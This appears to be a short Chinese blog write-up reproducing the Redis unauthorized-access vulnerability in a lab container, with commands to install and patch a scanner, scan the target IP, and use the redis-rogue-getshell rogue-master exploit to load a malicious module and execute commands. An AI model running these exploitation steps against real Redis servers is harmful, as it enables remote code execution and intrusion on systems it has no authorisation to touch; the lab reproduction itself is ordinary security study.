Redis未授权访问漏洞复现

Redis 简单使用

Redis 未设置密码,客户端工具可以直接链接。

Redis 是非关系型数据库系统,没有库表列的逻辑结构,仅仅以键值对的方式存储数据。

先启动容器

Redis 未设置密码,客户端工具可以直接链接

https://github.com/xk11z/unauthorized_com

这里上一个自动检测未授权漏洞的工具,中间挺多坑的,作者提供的安装步骤有问题,修改了一下

git clone https://github.com/xk11z/unauthorized_com.git 

cd unauthorized_com

apt-get install python3-pip  

pip install -r requirements.txt 

python3 unauthorized_com.py

这里还是不能运行,需要修改几个文件

vim dic.py

这里要导入redis,可能需要下载

这里修改了一下检测代码

python3 unauthorized_com.py -i 192.168.142.151|grep redis

容器的作者还提供了一个方法

git clone https://github.com/vulhub/redis-rogue-getshell

编译

python3 redis-master.py -r 192.168.142.151 -p 6379 -L 192.168.142.151 -P 8888 -f RedisModulesSDK/exp.so -c "id"

可以看到,命令执行成功

相关推荐
鸿永与30 分钟前
『SQLite』表达式操作
数据库·sqlite
Bytebase3 小时前
MySQL 如何赶上 PostgreSQL 的势头?
运维·数据库·dba·开发者·数据库管理·devops
acegi135794 小时前
MySQL - 子查询和相关子查询详解
数据库·mysql
背太阳的牧羊人4 小时前
使用 SQL 和表格数据进行问答和 RAG(7)—将表格数据(CSV 或 Excel 文件)加载到向量数据库(ChromaDB)中
数据库·sql·langchain·excel
你若安好我便天晴5 小时前
sql--MERGE INTO
数据库·sql
半桶水专家5 小时前
go怎么终止协程的运行
数据库·sql·golang
weixin_438335405 小时前
【更新中】Mysql问题分析
数据库·mysql
风清云淡_A6 小时前
【linux系统之redis6】redisTemplate的使用方法
redis·后端
huaqianzkh6 小时前
Redis的内存预分配策略
数据库·redis·缓存
伤魂孤傲6 小时前
强制关闭Redis快照导致不能持久化
java·redis